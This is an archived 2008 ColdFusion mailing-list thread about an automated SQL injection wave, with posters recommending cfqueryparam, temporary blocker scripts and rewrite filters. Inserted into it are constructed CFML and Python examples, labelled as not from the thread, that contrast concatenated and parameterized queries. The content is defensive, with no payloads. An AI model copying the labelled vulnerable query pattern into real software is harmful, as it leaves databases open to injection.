So, what is PCI-DSS (he asks sheepishly) or is that a whole nother Post????
Thanks everyone!
~David G. Moore, Jr.
P.S. Speaking of Smack Downs, Mary Jo's got a great right cross :) Go get 'em
girl!
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311327
> Does this thing just raise its ugly head every now and then
> and go away for a while? This is the first I have seen of it
> on my server.
This is the first large-scale automated SQL injection attack. Automated
attacks have been around for a long time, as have SQL injection attacks.
Honestly, this current attack is just a nuisance. SQL injection attacks are
usually more destructive, in that they often involve the theft of sensitive
data. In those cases, of course, the attack is manual rather than automated.
But if your site is vulnerable to this automated attack, it has always been
vulnerable to these manual, destructive attacks - which may have already
occurred without your knowledge.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Kelly
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311326
As someone who was hit by the attack on the first day, I will say I've
used cfqueryparam for years and yet I had a handful of pages with old
code where I was not using cfqueryparam. It just takes one page that's
publicly accessible to do damage. Once I fixed the pages in question,
try as they might, I have not been affected since.
Using cfqueryparam is a good habit to get into, to protect your sites
and client sites. I was also running a forum program I purchased years
ago CFForum2000 I think, and all the code in that product was not using
cfqueryparam either. I had to go through and edit the code throughout.
It's possible their newer versions are using proper coding but it was a
bit of a pain, and really my own fault for not rechecking that code long
ago.
Kelly
David Moore, Jr. wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311325
> When you say "Update Your Code", are you saying using <cfqueryparam>?
> But even so, the SQL injection still will use up countless resources instead of
> cutting it off early. So, go back and fix 1,000's of lines of code I have
> developed over the last 'umpteen' years or stop it before it starts? Is this
> something new to CF8 or just a necessary evil because of SQL Injection Attacks.
Essentially, yes, code should be using cfqueryparam and other secure
coding methods to keep the baddies out. The resources will get used
either way, really. You can either rely on a filter up-front and use up
CPU cycles regardless of whether a user is legitimate or not, or even
whether or not a query is being run in the page or not, etc. Or, you
can implement cfqueryparam where appropriate and only use those cycles
where they're needed, and you'll get the added benefit of prepared
statements on the SQL Server in most cases and the queries will run
slightly faster as a result. Either way you go, protect yourself and
your clients.
SQL injection attacks have been around since before I got started in web
development, and secure coding against them has been a best practice
just as long. I remember updating "old" CF code I inherited way back
when I was using ColdFusion 4, so it's certainly nothing new.
It's unfortunate that you haven't seen this in practice until now, but
it really is something you should be doing. It's been my observation
over the years that web programmers in general (not just limited to
ColdFusion) tend to learn about security only when there is a breach of
some kind, and then have to scramble to learn under fire. Just as an
example, how many out there run e-commerce applications and have never
heard of PCI-DSS?
I'm not picking on you specifically, David, so please don't think I'm
calling you out or anything. I'm always learning new things myself, but
we web developers need to collectively get more educated about the risks
and threats we face and alter our practice accordingly.
-Justin Scott
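An added example, not code from the thread or from any of the posters, of the change Justin is describing: the same query with the URL value spliced into the SQL text, then rewritten with cfqueryparam so the value travels as a bound parameter of a prepared statement. The datasource name, the "products" table and its columns, and the URL parameter names are assumptions.

```cfml
<!--- Added example, not code from the thread. Table "products", its columns,
      application.dsn and the URL parameter names are assumed. --->

<!--- BEFORE: the URL value becomes part of the SQL text. Whatever the request
      carries is handed to the database as statement, not as data. --->
<cfquery name="qProductBefore" datasource="#application.dsn#">
    SELECT productID, name, price
    FROM   products
    WHERE  productID = #url.productID#
</cfquery>

<!--- AFTER: cfqueryparam binds the value as a typed parameter. The statement
      text is fixed before the value is seen, so the value cannot change what
      the statement does, and a non-integer is rejected by CF before the
      database is called at all. Repeated calls reuse the prepared plan. --->
<cfquery name="qProductAfter" datasource="#application.dsn#">
    SELECT productID, name, price
    FROM   products
    WHERE  productID = <cfqueryparam value="#url.productID#" cfsqltype="cf_sql_integer">
</cfquery>

<!--- Strings get a type and a length cap too. list="true" expands a delimited
      list into one bound placeholder per item, which is how IN (...) is
      parameterized; the LIKE wildcards stay inside the bound value. --->
<cfquery name="qSearch" datasource="#application.dsn#">
    SELECT productID, name
    FROM   products
    WHERE  category IN (<cfqueryparam value="#url.categories#" cfsqltype="cf_sql_varchar" list="true">)
    AND    name LIKE <cfqueryparam value="%#url.term#%" cfsqltype="cf_sql_varchar" maxlength="100">
</cfquery>

<!--- cfqueryparam only binds values. Anything that must be SQL syntax, such
      as a column name in ORDER BY, has to come from a fixed allow-list. --->
<cfparam name="url.sort" default="name">
<cfset sortableColumns = "name,price">
<cfif listFindNoCase(sortableColumns, url.sort)>
    <cfset sortColumn = url.sort>
<cfelse>
    <cfset sortColumn = "name">
</cfif>
<cfquery name="qSorted" datasource="#application.dsn#">
    SELECT productID, name, price
    FROM   products
    ORDER BY #sortColumn#
</cfquery>
```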
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311324
And this is where I am. I have been using CF since 4.5. Very Scary. Glad I have
found this list. I am sure to learn a lot. I will try to read and not bother.
Thanks for the SMACK DOWN. I will start to write it in and become more learned. I
can say, just in the last weeks since joining I have learned a lot.
~David G. Moore, Jr.
----- Excess quoted text cut - see Original Post for more -----
Author: Josh Nathanson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311323
> Not trying to pick a fight, because I am sure you have forgotten more code
----- Excess quoted text cut - see Original Post for more -----
It depends on what you mean by "a lot". But, if you'd been hanging out on
this list at all, you'd have heard of cfqueryparam. It's discussed quite
often. But, since most people learn ColdFusion on their own, and it's not a
"necessary" tag to know about to get things done, you could go for years
without using it or even understanding why it's needed.
-- Josh
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311322
David Moore, Jr. wrote:
> Not trying to pick a fight, because I am sure you have forgotten more code
> than I will ever know (seriously) and I am probably just being lazy (seriously),
> but is <cfqueryparam> something a lot of programmers really use? I have
> never seen <cfqueryparam> used on any tags I have purchased or exchanged
> and I am afraid all I know is what I have learned from books and forums. This is
> the first I have ever heard of using <cfqueryparam>.
Yes <cfqueryparam...> is well used and for very good reasons. One of
which is what do you want to happen if the next clever hacker comes
along with an attack that gets around all these solutions that have been
developed to stop them at the gate? Do you really want to gamble your
data and possibly your career on the fact that you can outguess every
hacker, who collectively have almost endless time and resources to figure
out ways around these solutions?
I equate it to this analogy I have been dying to use for some time.
Would you never build the city walls and gates just because you have
sentries watching the road? No matter how good and undefeatable you
think your sentries are.
Or why have database passwords if you have a firewall. (That one might
be better)
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311321
> When you say "Update Your Code", are you saying using <cfqueryparam>?
Yes, that's what he is saying.
> so, go back and fix 1,000's of lines
> of code I have developed over the last 'umpteen' years or stop it
> before it starts?
Because if you don't, you are putting a LOT of faith in these blockers and
assuming that hackers won't find other ways to attack a vulnerable application
that doesn't get by them. Personally, I'm not sure I'd put *that* much trust in
them, if I really cared about my sites being safe.
> Is this something new to CF8 or just a necessary
> evil because of SQL Injection Attacks.
Nothing new, and certainly not unique to ColdFusion either.
> is <cfqueryparam> something a lot of programmers
> really use?
Uh, yes.
> This is the first I have ever heard of using <cfqueryparam>.
That is a truly scary thought. I hope you will spend some time on the ColdFusion
blogs which have lots of information on the importance of using it.
--- Mary Jo
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311320
When you say "Update Your Code", are you saying using <cfqueryparam>? But
even so, the SQL injection still will use up countless resources instead of
cutting it off early. So, go back and fix 1,000's of lines of code I have
developed over the last 'umpteen' years or stop it before it starts? Is this
something new to CF8 or just a necessary evil because of SQL Injection Attacks.
Not trying to pick a fight, because I am sure you have forgotten more code than I
will ever know (seriously) and I am probably just being lazy (seriously), but is
<cfqueryparam> something a lot of programmers really use? I have never seen
<cfqueryparam> used on any tags I have purchased or exchanged and I am
afraid all I know is what I have learned from books and forums. This is the first
I have ever heard of using <cfqueryparam>.
~David G. Moore, Jr.
----- Excess quoted text cut - see Original Post for more -----
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311317
> I am currently using the SQLprev.cfm from Jochem to stop the onslaught of
> superfluous bandwidth suckage from my server, but was wondering what the
> difference would be with this one. I am not looking to start a "my SQL Injection
> blocker is better than yours", yet trying to educate myself on just what is going
> on and what is best to do.
My original SQLprev script (http://www.gravityfree.com/_sqlprev.cfm.txt)
just checks for basic SQL keywords with a semicolon in URL variables.
It's a quick and dirty way to give you some protection from bots
short-term while your code base is updated to use best practices and
secure coding methods. Mary Jo's is more thorough in that it checks
additional variable scopes, and can help protect better against
hand-drafted attacks, but may have a higher potential for false
positives (though it's improved recently from what I can tell).
SQLPrev has a version compatible with CF5 for those who need it where
the other script relies on CFMX functions to run. I'm not saying one is
better than the other, they both get the job done. Just use whatever
works best for you, and update your code so that you don't need either
of them <g>.
-Justin Scott
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311314
> I am currently using the SQLprev.cfm from Jochem to stop the onslaught
> of superfluous bandwidth suckage from my server, but was wondering
> what the difference would be with this one.
Since I am not familiar with his, I cannot say what the difference would be. I
did include URL, form, cookie and common CGI variables into mine as well so it's
pretty comprehensive for both this attack and others that might start looking for
other vulnerable areas. It uses Gabriel's method of leveraging the java regex
pattern matcher, which seems to give better performance and is less likely to hang
on large strings than with CF. Luis Melo who contributed the RegEx that I am now
using has his own SQLi blocker as well that includes a bunch of additional
functions (such as keeping a list of blacklisted IP addresses in application
memory) which some people may like as well. My goal was to just try and put
something together that could easily be dropped in any application and do its
thing with fairly minimal overhead.
> Does this thing just raise its ugly head every now and then and go
> away for a while? This is the first I have seen of it on my server.
This particular attack? It does seem to come and go. I have no doubt the hackers
will look for other avenues to exploit once it seems that this one is no longer
having much effect.
Author: David Moore, Jr.
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311313
I am currently using the SQLprev.cfm from Jochem to stop the onslaught of
superfluous bandwidth suckage from my server, but was wondering what the
difference would be with this one. I am not looking to start a "my SQL Injection
blocker is better than yours", yet trying to educate myself on just what is going
on and what is best to do.
Does this thing just raise its ugly head every now and then and go away for a
while? This is the first I have seen of it on my server.
Thanks in advance,
~David G. Moore, Jr.
UpstateWeb, LLC
----- Excess quoted text cut - see Original Post for more -----
Author: Mary Jo Sminkey
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311311
> I also had a concern about thread safety; it's caching the java.util.
> regex.Matcher object in Application scope, and calling Application.
> injChecker.reset(testvar) for each url/form/etc variable -- seems like
> Matcher.reset() changes state of the cached Matcher object?
Thanks for pointing this out...I updated the tool on my site to address this and
also switched it to use a different RegEx that seems to work better and throw
less false positives. Same link to download as before:
http://www.cfwebstore.com/index.cfm?fuseaction=page.download&downloadID=18
--- Mary Jo
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311306
I am still getting around 50 to 75 attacks a day on about 20 of my websites. I
applied the solution from JOCHEM that aborts the attack in the application.cfm
file and then sends me an email.
They just keep coming from different IP addresses so it is useless to do anything
other than wait for the storm to pass and watch them eat up bandwidth.
In the words of one of my all time favorites....AUGH! (that would be Charlie
Brown for all you young ones)
David G. Moore, Jr.
UpstateWeb, LLC
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311277
Qing, when you use cfquery with cfqueryparam, a prepared statement is
generated. So basically, you will be making ASP do the same thing CF does.
CF just makes it easier. :)
~Brad
----- Excess quoted text cut - see Original Post for more -----
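Brad's point that cfqueryparam turns the query into a prepared statement, shown as an added example in Python rather than CFML (not code from the thread or from ColdFusion): the same lookup written by splicing the value into the SQL text, as the unpatched #variable# queries in this thread do, and written with a bound parameter, which is what cfqueryparam, or a prepared statement in ASP, does. The users table, the sample rows and the bind_typed helper that mimics the cfsqltype check are constructed for the demo.

```python
import re
import sqlite3

# Constructed sample rows for the demo; not from the original thread.
SAMPLE_USERS = [(1, "O'Brien", "editor"), (2, "Jochem", "admin"), (3, "Brad", "editor")]


def open_demo_db():
    """Create an in-memory SQLite database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_role_concat(conn, name):
    """Unsafe form: the value is spliced into the SQL text, so the database
    parser treats it as part of the statement (the plain #name# cfquery
    that people in this thread are patching)."""
    sql = "SELECT role FROM users WHERE name = '" + name + "'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def find_role_param(conn, name):
    """Prepared-statement form: the SQL text is fixed and the value travels
    as a separately bound parameter, which is what <cfqueryparam> does."""
    row = conn.execute("SELECT role FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def bind_typed(value, cfsqltype):
    """Hypothetical stand-in for cfqueryparam's cfsqltype check: coerce the
    value to the declared type or raise before any SQL is sent."""
    if cfsqltype == "cf_sql_integer":
        text = str(value).strip()
        if not re.fullmatch(r"-?\d+", text):
            raise ValueError(f"invalid data {value!r} for {cfsqltype}")
        return int(text)
    if cfsqltype in ("cf_sql_varchar", "cf_sql_char"):
        return str(value)
    raise ValueError(f"unsupported cfsqltype {cfsqltype!r}")


def find_name_by_id(conn, raw_id):
    """Typed bound parameter: raw_id (for example a URL variable) must pass
    the integer check before the query runs."""
    user_id = bind_typed(raw_id, "cf_sql_integer")
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row[0] if row else None


def compare(name):
    """Run both lookups on the same input. Returns (concat_result, param_result);
    concat_result is the exception class name when the spliced statement
    fails to parse."""
    conn = open_demo_db()
    try:
        concat_result = find_role_concat(conn, name)
    except sqlite3.Error as exc:
        concat_result = type(exc).__name__
    param_result = find_role_param(conn, name)
    conn.close()
    return concat_result, param_result


def lookup_by_id(raw_id):
    """Return the name for raw_id, or the ValueError message when the value
    fails the type check (nothing reaches the database in that case)."""
    conn = open_demo_db()
    try:
        return find_name_by_id(conn, raw_id)
    except ValueError as exc:
        return str(exc)
    finally:
        conn.close()


if __name__ == "__main__":
    print(compare("Jochem"))    # ('admin', 'admin')
    print(compare("O'Brien"))   # ('OperationalError', 'editor')
    print(lookup_by_id("2"))    # Jochem
    print(lookup_by_id("2 x"))  # invalid data '2 x' for cf_sql_integer
```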
Author: Qing Xia
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311271
Neat! Thanks Dave.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311265
> What is the ASP equivalent of CFQUERYPARAM?
http://prepared-statement.blogspot.com/
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Qing Xia
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311257
Hello folks:
I am sorry about the thread jump here, but any ASP gurus out there on this
discussion list?
In the past week, I have been fanatically patching our old CF code and
applying CFQUERYPARAM wherever it applies. Additionally, I also implemented
the SQL Injection Blocker written by Gabriel and Mary Jo. It is extremely
helpful.
However, a big chunk of our old application is written in ASP. It was an
off-the-shelf content-management-system which we plan to replace soon. I
have no experience with ASP, but from the database being hit, it is pretty
certain that the injection must have come through the ASP code.
Is there a quick-and-dirty fix for ASP code regarding this sql injection?
Has anybody written the SQL injection blocker function in ASP? What is the
ASP equivalent of CFQUERYPARAM?
BTW, I know that another effective method would be to install a Web
Server injection filter--but that is not within my control and the only
thing I can do now is on the code side.
Thanks and any help will be most appreciated!
Qing Xia
On Sun, Aug 17, 2008 at 12:43 PM, Jochem van Dieten <jochemd@oli.tudelft.nl> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311154
denstar wrote:
----- Excess quoted text cut - see Original Post for more -----
I don't think simple solutions exist. The closest I have seen that still
was simple yet appeared to be somewhat effective was a company that did
something akin to hungarian notation. They had all their variables typed
like user_uuid and article_int and they did type / bounds checking in
the webserver, throwing security errors on every type mismatch or
occurrence of a variable without the type declared.
Jochem
Author: Justin D. Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311151
> Filtering means "allow unless it matches". A security
> measure should be "deny unless it matches".
I believe that depends on the proportion of wanted vs. unwanted items. On a
firewall, this is the best approach because there are far more ports that
you don't want to have available than there are that you do want available,
so a "deny everything and allow these few" approach is workable.
Trying to apply the same logic to URLs isn't workable in my opinion. With
dynamic web applications there are a virtually unlimited number of "good"
URLs that are possible, and only a handful that are undesirable. This is
especially true if you pass session tokens through the URL for session
management.
I can think of a few ways to implement a security system to allow only
"approved" URLs, but none of them are any more effective than using secure
coding methods to begin with. If you have a novel approach I'd be
interested in learning about it.
-Justin Scott
Author: Dave Francis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311150
>But hey I am not complaining...
Who are you, and why are you using Andrew's email address?
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311149
Yeah, well my personal blog is on a shared hosting. But it uses Ray's
BlogCFC, so I feel safe. The problem though is that I don't get to see the
logs for the server, and have to rely on the hosting provider. As cheap as
they are, I do feel safe believe it or not.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311148
Andrew,
I need to check with my hosting provider to see if they've taken any
measures, but at least I'm on a VPS instead of shared hosting using MySQL.
After running my own server for 5 years and decided that the cost of
VPS's made it worth outsourcing the hosting again, I can't imagine going
back to shared hosting and putting up with the limitations. But sometimes,
it's necessary in some situations.
For now, it looks like I'm protected. But I know the time is coming.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311147
----- Excess quoted text cut - see Original Post for more -----
So long as it's simple list of matches, right? If the list is too
complicated, you get the Godel's Theorem effect, neh? :-)
Heh, I can see it now-- MG3 not only auto-generates your controllers
and XML and whatnot, but using the power of introspection, it adds
rewrite rules to your vhost conf file per event, with type-binding!
That actually sounds pretty cool.
See, I'm wondering if this is closer to searching than security,
per-se. Sorta thinking (it's getting late, so bear with me :) of a
lame example: I could parse a paragraph looking for every word that's
good, and tossing out the swear-words-- or just look for swear-words.
Which is going to be faster? Which list is longer?
Maybe that analogy is broken. Probably. Hmm... Yup, cause you'd have
to throw in that they could make up new curses as well, without you
even knowing. Hmm... Well, I'm sure you get the point I'm trying to
make by now (which could be a non-point), but I'll elaborate further,
because I'm not sure if it is a point :-)p
I'd want the lowest-level, most used to be the fastest checks, and the
highest level, least used to be the slowest, most thorough. In an
ideal world, you could run the highest all the time, but that might be
a fake world, because the more encrypted you get, the longer it takes,
not only to break, but to encode and decode. Maybe. Probably another
broken analogy (and a lie ta boot), but whatever. :)
Hmm... if you've got access to all the data at each level (what to
allow, say, in rewrite rules, or query parameters, etc.), I don't see
why you couldn't lock it down to only what's possible, vs. what could
be. It would take organization tho. Borg-like, Terminator-making
organization. :-)
Or maybe you've got a simple solution, to how one would limit URL
requests to only allowable values? I can't see anything short of
automation, but that's why this is taking so long. Probably
overlooking something simple.
Eh.
What's your scenario, to help me grok this here, Jochem? Search
Engine Safe? Ha! That's simple! Force a pattern-- string([A-z]),
number, string! Easy.
Is that a solve?
Damn. This, by now dead, horse is freaking beat. I'm going to sign off now...
--
slowly steps away from the keyboard...
--
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311146
LoL...
At the end of the day I see hibernate as a great tool, and hasn't been till
recently that I discovered how easy it is to use. Not perfect or as good as
GORM...
But hey I am not complaining...
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Jochem van Dieten
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311144
denstar wrote:
>
>> I haven't mentioned this before because I do believe that filtering
>> request URLs is the wrong approach
>
> Care to elaborate on this?
Filtering means "allow unless it matches". A security measure should be
"deny unless it matches".
Jochem
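Jochem's "deny unless it matches" rule, combined with the typed-variable convention he describes elsewhere in the thread (names like user_uuid and article_int, type and bounds checked in the web server, a security error on any mismatch or on any variable without a type), as an added Python example that is not code from the thread. The suffix table, the validators and the SecurityError class are my own constructions; the input is assumed to be a plain query string.

```python
import re
import uuid
from urllib.parse import parse_qsl


class SecurityError(Exception):
    """Raised for any request variable that is not explicitly allowed."""


def _as_int(raw, low=-2**31, high=2**31 - 1):
    """Integer with a bounds check, e.g. article_int."""
    if not re.fullmatch(r"-?\d{1,10}", raw):
        raise ValueError(f"not an integer: {raw!r}")
    value = int(raw)
    if not low <= value <= high:
        raise ValueError(f"out of range: {value}")
    return value


def _as_uuid(raw):
    """Canonical UUID, e.g. user_uuid; uuid.UUID raises ValueError on junk."""
    return str(uuid.UUID(raw))


def _as_str(raw, max_len=64):
    """Short identifier-like string, e.g. sort_str: letters, digits, _ and -."""
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,%d}" % max_len, raw):
        raise ValueError(f"not a plain identifier: {raw!r}")
    return raw


# Hypothetical suffix -> validator table: the suffixes the post mentions
# (int, uuid) plus a plain-string type so ordinary parameters can be typed too.
TYPE_VALIDATORS = {"int": _as_int, "uuid": _as_uuid, "str": _as_str}


def validate_query_string(query_string):
    """Deny-by-default check of a raw query string.

    Every variable must carry a known type suffix and its value must satisfy
    that type. An untyped variable, an unknown type or a mismatch raises
    SecurityError, the way the post describes the web server throwing
    security errors. Returns {name: typed_value} when everything passes.
    """
    typed = {}
    for name, raw in parse_qsl(query_string, keep_blank_values=True):
        base, sep, suffix = name.rpartition("_")
        if not sep or not base:
            raise SecurityError(f"variable without type suffix: {name!r}")
        validator = TYPE_VALIDATORS.get(suffix)
        if validator is None:
            raise SecurityError(f"unknown type {suffix!r} on {name!r}")
        try:
            typed[name] = validator(raw)
        except ValueError as exc:
            raise SecurityError(f"type mismatch for {name!r}: {exc}") from None
    return typed


def is_allowed(query_string):
    """True when the request passes the check, False when it would be rejected."""
    try:
        validate_query_string(query_string)
        return True
    except SecurityError:
        return False


if __name__ == "__main__":
    print(validate_query_string("article_int=42&sort_str=date-desc"))
    print(is_allowed("page=1"))  # False: no type suffix, so denied
```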
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311142
> Well at the end of the day, I am currently using hibernate in ColdFusion
> thanks to Joe Reinhart I think is the one I am using. But I know plenty of
> people are looking into it at the moment.
Hibernate is easy to use with CF8 and Java. Few lines of code.
Now, CF objects and hibernate is another matter. :-)
The first thing I did was hook up HibernateTools (DB reverse
engineering into POJOs or HBMs), but I didn't feel that was right for
the majority of CF devs.
And Having to restart things to see changes and whatnot? Neh. Crazy
classloading-ness? Neh.
Hooking into a java-based model? Sure. Taking advantage of all the
awesome java tools? Priceless.
But it ain't CF, per-se. Not that that matters, of course, I just
decided I wanted it to, for kicks.
> I have even looked at using GORM in Coldfusion, to help with DDD. But
> haven't had the time to investigate as of yet. But I am very happy to even
> just use POJO's for now.
Right on. Looks like a GORM-ish deal wouldn't be hard to rock with
about any ORM.
When you talk about DDD, how are you representing the domain? Are you
using a modeling language?
Thanks,
DeN
--
Nothing except the mint can make money without advertising.
Thomas B. Macaulay
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311141
Well at the end of the day, I am currently using hibernate in ColdFusion
thanks to Joe Reinhart I think is the one I am using. But I know plenty of
people are looking into it at the moment.
I have even looked at using GORM in Coldfusion, to help with DDD. But
haven't had the time to investigate as of yet. But I am very happy to even
just use POJO's for now.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311137
There are always trade-offs.
Everything you add is a few (or more) cycles, and you've got to at
least sorta aim for optimization (if ambiguously).
Like, the hibernate stuff seems plenty fast to me right now, but what
happens when I toss a ton of requests at it, or use large tables or
something?
It would be cool to have a switch to turn it on tho, and leave it on
by default. :-)
----- Excess quoted text cut - see Original Post for more -----
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311134
No I am not arguing about it, I am saying that there is no reason that
ColdFusion could not do what I said it could. It only means that with the
release of ColdFusion 9, it is more of a possibility that SQL Injection will
become a thing of the past for ColdFusion.
It doesn't excuse the fact that when cfqueryparam was introduced, it
couldn't have done something like this a long time ago.
The argument came about because people believed it was not possible for
ColdFusion to do this stuff under the hood, the reality was that it could
have a long time ago. It just never was a request or thought about before.
If you read anything I have said, you would see I am not arguing about it.
But making a statement that it was and could have been possible. Nothing
more nothing less. It was everyone else who disagreed, well almost everyone
else.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311131
Rick,
I think it is only a matter of time, I only have one ColdFusion website that
is on a shared server/public. I have been through the attacks, but when
speaking with the hosting provider I think they started to put measures in
place for the entire servers.
Not 100% sure, as I haven't seen these attacks for nearly 2 years. So I
better touch some wood:-)
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: Andrew Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311130
Another not so common approach, is spamstop.
This little wrapper for cf, allows someone to filter the request by known
attackers. So you could redirect them away or display garbage on the screen
or whatever.
Maybe another stop gap measure.
--
Senior Coldfusion Developer
Aegeon Pty. Ltd.
www.aegeon.com.au
Phone: +613 9015 8628
Mobile: 0404 998 273
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311129
So for six months you've known the feature is coming yet you're still
arguing about it now? Do you just like wasting people's time?
> Man, you're about 6 months late with that news....
>
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311126
I'm doing the request filtering in apache so that it never even
bothers my CF engine with the request, but I was wondering if Jochem
didn't like the filtering for a reason.
I wouldn't rely on it alone in any way, shape or form, but just
cutting down on the "spam" hits on the application seems like a worthy
deal.
Doing it at the network level would be even faster and less intensive
application-wise, but I'm wondering if there's a problem with the very
idea that I haven't thought of.
Accidentally removing legitimate traffic, or just trading one weakness
for another-- something like that.
We need to be preventing this stuff on every level, layered like an
onion, as someone said earlier.
I was not endorsing request filtering as a sole means of protection,
for the record. :-)
Gracias for the info on what turning on global script protection actually is!
:Den
--
He had a wonderful talent for packing thought close, and rendering it portable.
Thomas B. Macaulay
----- Excess quoted text cut - see Original Post for more -----
Author: Rick Faircloth
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311123
Man... at this point, after reading about all of these problems with
SQL injection, and having been told that it doesn't concern MySQL, I'm glad
I'm using MySQL. This would be one big, time-consuming headache, otherwise.
I'm a solo developer and can use whatever DB I prefer, but I realize some
of you have to use the affected DB's.
I'm sure the whole thing is nothing but aggravation, to the point of wanting
to strangle (or shoot, if you're Andrew :o) (at least I think that's his preferred
method of punishment) those abusing the DB's with attacks.
However, my day to deal with the attackers will come, I'm sure...hang in there,
guys and gals.
Rick
----- Excess quoted text cut - see Original Post for more -----
Author: David Moore
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311120
----- Excess quoted text cut - see Original Post for more -----
>~Brad
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311119
David,
As a stop gap while in full force you could use the ISAPI filtering
technique or apache rewrite. This would keep it from reaching CF. Of course
that still might mean changing for every site in your pool of sites. I have
a post on it... The comments are pretty useful as well:
http://www.coldfusionmuse.com/index.cfm/2008/8/8/isapi-rewrite-rule-prevents
-sql-injection
There are about 6 or 8 posts on the topic and links to many other blogs as
well.
If that doesn't work, I have dropped a blocker script into a few dozen
vulnerable sites - again as a stop gap. It is important to note that these
can only be considered a temporary fix.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#311118
> I am new to the post, but I have been programming in CF for over 10 years
> and know some of you from the CF Forums.
>
> I am getting slammed with this crud as well on over 30 of my websites. Any
> suggestions as how to handle this for multiple sites on 1 server? I just
> discovered the issue as it seems to be targeting multiple sites on my server.
What people have done:
1. Make sure the database login that CF is using does not have access
to the system tables. This particular attack queries the schema to
find tables and fields to attack.
2. Put in place some kind of url rewrite rules to catch the threat and
